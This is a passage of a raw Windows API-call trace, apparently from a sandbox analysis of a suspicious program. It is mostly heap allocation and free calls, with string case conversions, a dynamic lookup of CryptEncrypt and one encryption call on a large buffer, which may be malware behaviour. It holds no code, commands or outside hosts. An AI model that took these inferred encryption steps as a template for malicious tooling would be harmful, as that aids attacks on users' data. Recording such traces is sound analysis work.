lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.631] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.631] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.632] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.633] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.633] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.633] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.633] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.634] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.634] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.634] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.635] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0209.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.635] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.636] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0209.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3501db0 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aaac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.642] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a80 [0209.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0209.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0209.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0209.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0209.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0209.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0209.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0209.643] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1a918, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x1a920) returned 1 [0209.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 